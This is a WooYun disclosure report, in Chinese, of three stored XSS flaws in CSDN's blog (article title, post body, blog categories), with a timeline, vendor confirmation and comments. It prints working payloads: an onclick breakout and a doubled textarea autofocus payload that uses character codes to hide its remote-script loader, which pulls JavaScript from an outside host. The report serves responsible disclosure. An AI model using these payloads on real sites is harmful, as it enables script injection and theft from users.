当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046772

漏洞标题:CSDN博客多处存储型XSS漏洞

相关厂商:CSDN开发者社区

漏洞作者: mramydnei

提交时间:2013-12-23 11:53

修复时间:2014-02-06 11:53

公开时间:2014-02-06 11:53

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-23: 细节已通知厂商并且等待厂商处理中
2013-12-23: 厂商已经确认,细节仅向厂商公开
2014-01-02: 细节向核心白帽子及相关领域专家公开
2014-01-12: 细节向普通白帽子公开
2014-01-22: 细节向实习白帽子公开
2014-02-06: 细节向公众公开

简要描述:

过滤方式存在缺陷

详细说明:

看了下上次提交的结果:”2013-09-12:修复漏洞“
测试了一下,好像并没有被修复。不知道是修复的姿势不对还是没有修复
共发现3处XSS漏洞。
第一处,文章标题。
文章标题会最后输出到收藏按钮的onclick事件里面,由于没有在输出前进行escape导致可植入恶意javascript代码(用户点击收藏时触发)

<span class="link_collect"><a href="javascript:void(0);" onclick="javascript:collectArticle('');alert(1);//','17491847');return false;" title="收藏">收藏</a></span>


这里只是个弹窗示例,实际测试过程当中发现可通过appendchild插入远程js代码
第二处和第三处使用了同样的过滤方式,也可以看作是一处。分别为“博文正文”和“添加博客栏目功能”
过滤器在处理某些标签时,会被绕过(同一个payload插入两次或者更多次),测试代码:

<textarea onfocus=document.head.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src=String.fromCharCode(47,47,112,108,101,98,115,46,109,101,47,48,46,106,115) autofocus></textarea><textarea onfocus=document.head.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src=String.fromCharCode(47,47,112,108,101,98,115,46,109,101,47,48,46,106,115) autofocus></textarea>


2013-12-23 02:43:35的屏幕截图.png


漏洞证明:

1.png


2.png

修复方案:

关于如何防御XSS,可以参考下面的链接:
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

版权声明:转载请注明来源 mramydnei@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-12-23 12:16

厂商回复:

尽快修复

最新状态:

暂无


漏洞评价:

评论

  1. 2014-02-06 17:28 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    不是说打不到cookie的xss不给过吗?

  2. 2014-02-09 14:17 | 橙夏 ( 实习白帽子 | Rank:35 漏洞数:4 | 喵呜喵呜喵呜呜呜 喵呜呜喵呜呜呜呜 喵呜呜...)

    好吧textarea当年也试过为什么没成功。。。